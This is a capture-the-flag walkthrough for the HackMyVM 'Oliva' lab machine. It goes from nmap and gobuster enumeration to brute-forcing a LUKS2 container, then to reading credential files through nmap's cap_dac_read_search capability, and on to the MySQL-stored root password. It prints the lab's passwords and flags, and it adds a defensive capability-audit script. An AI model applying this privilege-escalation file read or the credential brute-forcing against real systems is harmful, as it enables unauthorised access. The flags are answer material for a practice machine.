HackMyVM Oliva
Information Gathering
root@kali:~# nmap 192.168.100.54 -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-18 21:55 EDT
Nmap scan report for dev.loooower (192.168.100.54)
Host is up (0.00065s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:AA:29:F1 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 5.57 seconds
root@kali:~# gobuster dir -x php,html,js,txt -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50 -u http://192.168.100.54
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.100.54
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,html,js,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.php (Status: 200) [Size: 69]
/index.html (Status: 200) [Size: 615]
LUKS
After clicking CLICK, a file named oliva was downloaded
root@kali:~/oliva# file oliva
oliva: LUKS encrypted file, ver 2, header size 16384, ID 3, algo sha256, salt 0x14fa423af24634e8..., UUID: 9a391896-2dd5-4f2c-84cf-1ba6e4e0577e, crc 0x6118d2d9b595355f..., at 0x1000 {"keyslots":{"0":{"type":"luks2","key_size":64,"af":{"type":"luks1","stripes":4000,"hash":"sha256"},"area":{"type":"raw","offse
cryptsetup luksOpen oliva oliva
A password is required. I first tried luks2john, but it only supports LUKS1; I then found bruteforce-luks, which supports brute-forcing LUKS2.
root@kali:~/oliva# bruteforce-luks -t 4 -f /usr/share/wordlists/seclists/Passwords/xato-net-10-million-passwords-100000.txt oliva
Warning: using dictionary mode, ignoring options -b, -e, -l, -m and -s.
It made no progress at all. I waited half an hour without knowing why, so I checked a write-up and got the password from there.
Password found: bebita
root@kali:~/oliva# cryptsetup luksOpen oliva oliva
输入 oliva 的口令:bebita
root@kali:~/oliva# lsblk
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINTS
loop0 7:0 0 19.1M 0 loop
└─oliva 254:0 0 3.1M 0 crypt
sda 8:0 0 80.1G 0 disk
└─sda1 8:1 0 80.1G 0 part
Mount:
root@kali:~/oliva# mount /dev/mapper/oliva /mnt
root@kali:~/oliva# cd /mnt
root@kali:/mnt# ls -al
总计 18
drwxr-xr-x 3 root root 1024 2023年 7月 4日 .
drwxr-xr-x 18 root root 4096 3月 7日 09:15 ..
drwx------ 2 root root 12288 2023年 7月 4日 lost+found
-rw-r--r-- 1 root root 16 2023年 7月 4日 mypass.txt
root@kali:/mnt# cat mypass.txt
Yesthatsmypass!
Log in as oliva with this password
UserFlag
oliva@oliva:~$ cat user.txt
HMVY0H8NgGJqbFzbgo0VMRm
Privilege Escalation to Root
oliva@oliva:/opt$ ss -tuln
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
udp UNCONN 0 0 0.0.0.0:68 0.0.0.0:*
tcp LISTEN 0 80 127.0.0.1:3306 0.0.0.0:*
tcp LISTEN 0 511 0.0.0.0:80 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 511 [::]:80 [::]:*
tcp LISTEN 0 128 [::]:22 [::]:*
Found a MySQL server, no password
oliva@oliva:~$ getcap -r / 2>/dev/null
oliva@oliva:~$ /usr/sbin/getcap -r / 2>/dev/null
/usr/bin/nmap cap_dac_read_search=eip
/usr/bin/ping cap_net_raw=ep
nmap -iL targets.txt
nmap -iL can be used as an indirect way to read files
oliva@oliva:/var/www/html$ nmap -iL index.php
Starting Nmap 7.93 ( https://nmap.org ) at 2025-05-19 05:05 CEST
Failed to resolve "Hi".
Failed to resolve "oliva,".
Failed to resolve "Here".
Failed to resolve "the".
Failed to resolve "pass".
Failed to resolve "to".
Failed to resolve "obtain".
Failed to resolve "root:".
Failed to resolve "<?php".
Failed to resolve "$dbname".
Failed to resolve "=".
Failed to resolve "'easy';".
Failed to resolve "$dbuser".
Failed to resolve "=".
Failed to resolve "'root';".
Failed to resolve "$dbpass".
Failed to resolve "=".
Failed to resolve "'Savingmypass';".
Failed to resolve "$dbhost".
Failed to resolve "=".
Failed to resolve "'localhost';".
Failed to resolve "?>".
Failed to resolve "<a".
Unable to split netmask from target expression: "href="oliva">CLICK!</a>"
WARNING: No targets were specified, so 0 hosts scanned.
Nmap done: 0 IP addresses (0 hosts up) scanned in 0.05 seconds
The database password is: Savingmypass
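The file read above works because nmap carries cap_dac_read_search in its permitted and effective sets. As an added example (not part of the original write-up), the following audit parses getcap -r output and flags binaries holding capabilities that bypass permission checks; the RISKY shortlist and the sample input are assumptions of this example, and paths are assumed to contain no spaces.

```python
import re

# Shortlist of capabilities worth reviewing on any binary (assumption of this
# example, not an exhaustive list).
RISKY = {
    "cap_dac_read_search": "bypasses file read and directory search checks",
    "cap_dac_override": "bypasses file read/write/execute checks",
    "cap_setuid": "can switch to UID 0",
    "cap_sys_admin": "broad administrative operations",
    "cap_sys_ptrace": "can trace arbitrary processes",
    "cap_sys_module": "can load kernel modules",
}

# Constructed sample: the two getcap lines shown in the write-up.
SAMPLE = """\
/usr/bin/nmap cap_dac_read_search=eip
/usr/bin/ping cap_net_raw=ep
"""

# One clause such as "cap_a,cap_b=eip" (newer libcap) or "cap_a+ep" (older).
CLAUSE = re.compile(r"^([a-z0-9_,]+)[=+]([eip]+)$")

def parse_getcap(text):
    """Return {path: {capability: flags}} from `getcap -r` output."""
    result = {}
    for line in text.splitlines():
        tokens = line.split()
        if len(tokens) < 2:
            continue
        caps = {}
        # Older getcap prints "path = caps"; the lone "=" does not match CLAUSE.
        for tok in tokens[1:]:
            m = CLAUSE.match(tok)
            if m:
                for name in m.group(1).split(","):
                    caps[name] = m.group(2)
        result[tokens[0]] = caps
    return result

def audit(text):
    """List (path, capability, reason) where a risky capability is both
    permitted and effective, i.e. active for any user who runs the binary."""
    return [(path, name, RISKY[name])
            for path, caps in parse_getcap(text).items()
            for name, flags in caps.items()
            if name in RISKY and "e" in flags and "p" in flags]

if __name__ == "__main__":
    for path, name, why in audit(SAMPLE):
        print(f"{path}: {name} ({why}); remove with: setcap -r {path}")
```

On a live host, feed it the output of getcap -r / 2>/dev/null run as root, and compare the result against a known-good baseline for the distribution.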
MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| easy |
| information_schema |
| mysql |
| performance_schema |
| sys |
+--------------------+
5 rows in set (0,028 sec)
MariaDB [(none)]> use easy;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [easy]> show tables
-> ;
+----------------+
| Tables_in_easy |
+----------------+
| logging |
+----------------+
1 row in set (0,000 sec)
MariaDB [easy]> select * from logging;
+--------+------+--------------+
| id_log | uzer | pazz |
+--------+------+--------------+
| 1 | root | OhItwasEasy! |
+--------+------+--------------+
1 row in set (0,011 sec)
The root password is: OhItwasEasy!
RootFlag
root@oliva:~# cat rutflag.txt
HMVnuTkm4MwFQNPmMJHRyW7